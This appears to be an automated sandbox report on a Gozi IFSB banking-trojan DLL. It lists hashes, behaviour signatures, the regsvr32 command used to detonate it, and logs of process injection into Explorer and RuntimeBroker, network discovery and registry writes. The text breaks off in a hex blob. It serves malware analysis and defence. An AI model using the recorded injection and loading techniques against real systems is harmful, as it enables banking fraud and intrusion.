Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-thgh4sche6
Target de00c4750accf516704b8c0df265c24a
SHA256 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc

Threat Level: Known bad

The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Gathers system information

Runs net.exe

Enumerates processes with tasklist

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 16:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 16:03

Reported

2022-08-03 16:05

Platform

win7-20220715-en

Max time kernel

45s

Max time network

48s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1092 wrote to memory of 1644 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll

Network

N/A

Files

memory/1092-54-0x000007FEFBE31000-0x000007FEFBE33000-memory.dmp

memory/1644-55-0x0000000000000000-mapping.dmp

memory/1644-56-0x0000000075481000-0x0000000075483000-memory.dmp

memory/1644-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1644-62-0x00000000000E0000-0x00000000000ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 16:03

Reported

2022-08-03 16:05

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

125s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3932 set thread context of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 set thread context of 3448 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 3720 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 4104 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 536 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 set thread context of 2616 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db13e6613606261e295c366b3400b7db9497f7721833709005687624cef2c870" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000335525a752a7d801d93e8ea752a7d801d93e8ea752a7d801fdae0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000383965343338613332646639326236386261613939613762316638353365396335303136616332663432643237306463646230663232636361306435336632650000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000008fe29700380039006500340033003800610033003200640066003900320062003600380062006100610039003900610037006200310066003800350033006500390063003500300031003600610063003200660034003200640032003700300064006300640062003000660032003200630063006100300064003500330066003200650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38396534333861333264663932623638626161393961376231663835336539633530313661633266343264323730646364623066323263636130643533663265000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645d77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645d77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 4de967a852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = f1f395a652a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\43062c64cdc78544bd046edef55edfa8170856ee30b98e629b82464899b859a6" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = 9baac7a852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\93214ced978b1f3fa5c37bde5aa71302a07ca2e9469b370cc11bc61930803bf3" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 30ca9fa852a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ea4877a652a7d801ea4877a652a7d801ea4877a652a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000646231336536363133363036323631653239356333363662333430306237646239343937663737323138333337303930303536383736323463656632633837300000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000001669a100640062003100330065003600360031003300360030003600320036003100650032003900350063003300360036006200330034003000300062003700640062003900340039003700660037003700320031003800330033003700300039003000300035003600380037003600320034006300650066003200630038003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623133653636313336303632363165323935633336366233343030623764623934393766373732313833333730393030353638373632346365663263383730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645477a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645477a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8b1ea3dafdc11380b50b7cb71940868d9f0ca3e1578253ed3647204878806d8f" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d7a133a752a7d8011674a8a752a7d8011674a8a752a7d801678709000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000366436336336353136616531613765343065656136356461303264653136383639326562356333663162663434663937303633383538633331393865303137310000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000007e40b900360064003600330063003600350031003600610065003100610037006500340030006500650061003600350064006100300032006400650031003600380036003900320065006200350063003300660031006200660034003400660039003700300036003300380035003800630033003100390038006500300031003700310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f0